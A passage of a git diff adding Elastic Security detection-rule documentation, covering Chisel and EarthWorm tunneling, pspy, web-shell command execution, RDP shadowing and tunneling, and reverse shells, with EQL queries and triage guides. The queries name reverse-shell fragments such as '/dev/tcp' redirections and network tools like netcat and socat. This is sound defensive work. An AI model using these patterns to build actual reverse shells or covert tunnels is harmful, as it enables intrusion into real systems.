https://attack.mitre.org/techniques/T1059/001/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc new file mode 100644 index 0000000000..f03963f667 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client]] +=== Potential Protocol Tunneling via Chisel Client + +This rule monitors for common command line flags leveraged by the Chisel client utility followed by a connection attempt. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform +* https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args == "client" and process.args : ("R*", "*:*", "*socks*", "*.*") and process.args_count >= 4 and + process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action == "connection_attempted" and event.type == "start" and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" and + not process.name : ( + "python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "java", "telnet", + "ftp", "socat", "curl", "wget", "dpkg", "docker", "dockerd", "yum", "apt", "rpm", "dnf", "ssh", "sshd")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc new file mode 100644 index 0000000000..4ec7875ee6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server]] +=== Potential Protocol Tunneling via Chisel Server + +This rule monitors for common command line flags leveraged by the Chisel server utility followed by a received connection within a timespan of 1 minute. Chisel is a command-line utility used for creating and managing TCP and UDP tunnels, enabling port forwarding and secure communication between machines. Attackers can abuse the Chisel utility to establish covert communication channels, bypass network restrictions, and carry out malicious activities by creating tunnels that allow unauthorized access to internal systems. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform +* https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1m + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args == "server" and process.args in ("--port", "-p", "--reverse", "--backend", "--socks5") and + process.args_count >= 3 and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")] + [network where host.os.type == "linux" and event.action == "connection_accepted" and event.type == "start" and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" and + not process.name : ( + "python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk", "java", "telnet", + "ftp", "socat", "curl", "wget", "dpkg", "docker", "dockerd", "yum", "apt", "rpm", "dnf", "ssh", "sshd", "hugo")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc new file mode 100644 index 0000000000..61f1039453 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm]] +=== Potential Protocol Tunneling via EarthWorm + +Identifies the execution of the EarthWorm tunneler. Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection and network filtering, or to enable access to otherwise unreachable systems. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://rootkiter.com/EarthWorm/ +* https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and + process.args : "-s" and process.args : "-d" and process.args : "rssocks" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc new file mode 100644 index 0000000000..f7268627e7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected]] +=== Potential Pspy Process Monitoring Detected + +This rule leverages auditd to monitor for processes scanning different processes within the /proc directory using the openat syscall. This is a strong indication for the usage of the pspy utility. Attackers may leverage the pspy process monitoring utility to monitor system processes without requiring root permissions, in order to find potential privilege escalation vectors. + +*Rule type*: eql + +*Rule indices*: + +* logs-auditd_manager.auditd-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/DominicBreuker/pspy + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.pid, host.id with maxspan=5s +[ file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and + auditd.data.syscall == "openat" and file.path == "/proc" and auditd.data.a0 : ("ffffffffffffff9c", "ffffff9c") and + auditd.data.a2 : ("80000", "88000") ] with runs=10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Process Discovery +** ID: T1057 +** Reference URL: https://attack.mitre.org/techniques/T1057/ +* Technique: +** Name: System Information Discovery +** ID: T1082 +** Reference URL: https://attack.mitre.org/techniques/T1082/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc new file mode 100644 index 0000000000..9edffa73bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc @@ -0,0 +1,154 @@ +[[prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server]] +=== Potential Remote Code Execution via Web Server + +Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pentestlab.blog/tag/web-shell/ +* https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Initial Access +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Remote Code Execution via Web Server + +Adversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network. + +This rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible investigation steps + +- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes. + - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration. + - !{osquery{"label":"Osquery - Retrieve Listening Ports","query":"SELECT pid, address, port, socket, protocol, path FROM listening_ports"}} + - !{osquery{"label":"Osquery - Retrieve Open Sockets","query":"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets"}} + - Investigate the process information for malicious or uncommon processes/process trees. + - !{osquery{"label":"Osquery - Retrieve Process Info","query":"SELECT name, cmdline, parent, path, uid FROM processes"}} + - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes. + - !{osquery{"label":"Osquery - Retrieve Process Info for Webapp User","query":"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}"}} +- Examine the command line to determine which commands or scripts were executed. +- Investigate other alerts associated with the user/host during the past 48 hours. +- If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event") and process.parent.executable : ( + "/usr/sbin/nginx", "/usr/local/sbin/nginx", + "/usr/sbin/apache", "/usr/local/sbin/apache", + "/usr/sbin/apache2", "/usr/local/sbin/apache2", + "/usr/sbin/php*", "/usr/local/sbin/php*", + "/usr/sbin/lighttpd", "/usr/local/sbin/lighttpd", + "/usr/sbin/hiawatha", "/usr/local/sbin/hiawatha", + "/usr/local/bin/caddy", + "/usr/local/lsws/bin/lswsctrl", + "*/bin/catalina.sh" +) and +process.name : ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "python*", "perl", "php*", "tmux") and +process.args : ("whoami", "id", "uname", "cat", "hostname", "ip", "curl", "wget", "pwd") and +not process.name == "phpquery" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc new file mode 100644 index 0000000000..b09b36e12a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc @@ -0,0 +1,93 @@ +[[prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity]] +=== Potential Remote Desktop Shadowing Activity + +Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing +* https://swarm.ptsecurity.com/remote-desktop-services-shadowing/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +/* Identifies the modification of RDP Shadow registry or + the execution of processes indicative of active shadow RDP session */ + +any where host.os.type == "windows" and +( + (event.category == "registry" and + registry.path : ( + "HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow", + "\\REGISTRY\\MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Terminal Services\\Shadow" + ) + ) or + (event.category == "process" and event.type == "start" and + (process.name : ("RdpSaUacHelper.exe", "RdpSaProxy.exe") and process.parent.name : "svchost.exe") or + (process.pe.original_file_name : "mstsc.exe" and process.args : "/shadow:*") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc new file mode 100644 index 0000000000..56aea7d6d4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected]] +=== Potential Remote Desktop Tunneling Detected + +Identifies potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.netspi.com/how-to-access-rdp-over-a-reverse-ssh-tunnel/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Remote Desktop Tunneling Detected + +Protocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases, ranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would filter to reach their destination. + +Attackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP connections but may be more permissive to other protocols. + +This rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated with tools that perform tunneling. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine network data to determine if the host communicated with external servers using the tunnel. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. +- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key modification, etc. Inspect the host to learn which method was used and to determine a response for the case. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + /* RDP port and usual SSH tunneling related switches in command line */ + process.args : "*:3389" and + process.args : ("-L", "-P", "-R", "-pw", "-ssh") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc new file mode 100644 index 0000000000..3152876b9f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal]] +=== Potential Reverse Shell Activity via Terminal + +Identifies the execution of a shell process with suspicious arguments which may be indicative of reverse shell activity. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +* https://github.com/WangYihang/Reverse-Shell-Manager +* https://www.netsparker.com/blog/web-security/understanding-reverse-shells/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Reverse Shell Activity via Terminal + +A reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing. This activity is typically the result of vulnerability exploitation, malware infection, or penetration testing. + +This rule identifies commands that are potentially related to reverse shell activities using shell applications. + +#### Possible investigation steps + +- Examine the command line and extract the target domain or IP address information. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type in ("start", "process_started") and + process.name in ("sh", "bash", "zsh", "dash", "zmodload") and + process.args : ("*/dev/tcp/*", "*/dev/udp/*", "*zsh/net/tcp*", "*zsh/net/udp*") and + + /* noisy FPs */ + not (process.parent.name : "timeout" and process.executable : "/var/lib/docker/overlay*") and + not process.command_line : ( + "*/dev/tcp/sirh_db/*", "*/dev/tcp/remoteiot.com/*", "*dev/tcp/elk.stag.one/*", "*dev/tcp/kafka/*", + "*/dev/tcp/$0/$1*", "*/dev/tcp/127.*", "*/dev/udp/127.*", "*/dev/tcp/localhost/*", "*/dev/tcp/itom-vault/*") and + not process.parent.command_line : "runc init" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc new file mode 100644 index 0000000000..ef29cf1f3d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc @@ -0,0 +1,73 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process]] +=== Potential Reverse Shell via Background Process + +Monitors for the execution of background processes with process arguments capable of opening a socket in the /dev/tcp channel. This may indicate the creation of a backdoor reverse connection, and should be investigated further. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name in ("setsid", "nohup") and process.args : "*/dev/tcp/*0>&1*" and +process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc new file mode 100644 index 0000000000..047b3b00b9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc @@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-potential-reverse-shell-via-java]] +=== Potential Reverse Shell via Java + +This detection rule identifies the execution of a Linux shell process from a Java JAR application post an incoming network connection. This behavior may indicate reverse shell activity via a Java application. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m 